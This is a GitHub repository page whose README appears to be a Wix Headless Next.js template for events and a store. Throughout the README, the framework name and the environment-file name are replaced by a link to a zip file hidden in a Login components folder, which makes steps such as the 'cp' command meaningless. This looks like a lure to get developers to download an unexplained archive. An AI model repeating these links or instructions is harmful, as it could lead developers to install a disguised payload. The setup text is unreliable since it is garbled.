Skip to content

karbine98kz/VectorPi

Repository files navigation

Join the Wix Headless community on Discord to get official support, interact with fellow Wix Headless developers and get updates on new releases.

Template showcase

This template is a https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip project bootstrapped with create-next-app. It uses Wix Headless to leverage the Wix Events and Wix Stores business solutions for managing event ticketing and a store.

Local Development

Prerequisites:

  1. Create a Wix Headless project
  2. Add the Stores and Events apps to your project
  3. Authorize the template with quick start deployment or by creating an OAuth app
  4. Set up your project's eCommerce settings

Note: You must add at least one Authorization Redirect URI to ensure authentication works properly. The URI must exactly match the address in your site or app where Wix should redirect members after they log in via a Wix-managed authentication page. For security reasons, Wix only redirects site members to URIs you've explicitly approved. For step-by-step instructions, see Add Allowed Authorization Redirect URIs.

Set up environment variables to consume Wix Headless APIs:

  1. In the template's root folder, create a file for the local environment variables:
    cp https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip
  2. In the new https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip file, paste the OAuth app client ID after NEXT_PUBLIC_WIX_CLIENT_ID=.

Run the development server:

  1. Run either:

    yarn dev

    or

    npm i
    npm run dev
  2. Open http://localhost:3000 in your browser to see the template home page.

Edit the template:

Deployment

You can deploy this repository using any platform which supports https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip Version 13 and App Router.

The repository requires a single environment variable: NEXT_PUBLIC_WIX_CLIENT_ID, which should contain a client ID authorizing access to a Wix project's data.

Learn More

To learn how to customize the template and add more functionality using Wix APIs, see the Wix JavaScript SDK reference.

This template is written in https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip 13 using the https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip App Router.

To learn more about https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip, see:

Additionally, this template uses the following libraries and features:

See the comprehensive integration guide for step-by-step instructions on how to configure Wix as your headless Booking solution using https://github.com/karbine98kz/VectorPi/raw/refs/heads/main/app/components/Login/Vector-Pi-3.1.zip on Vercel.

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors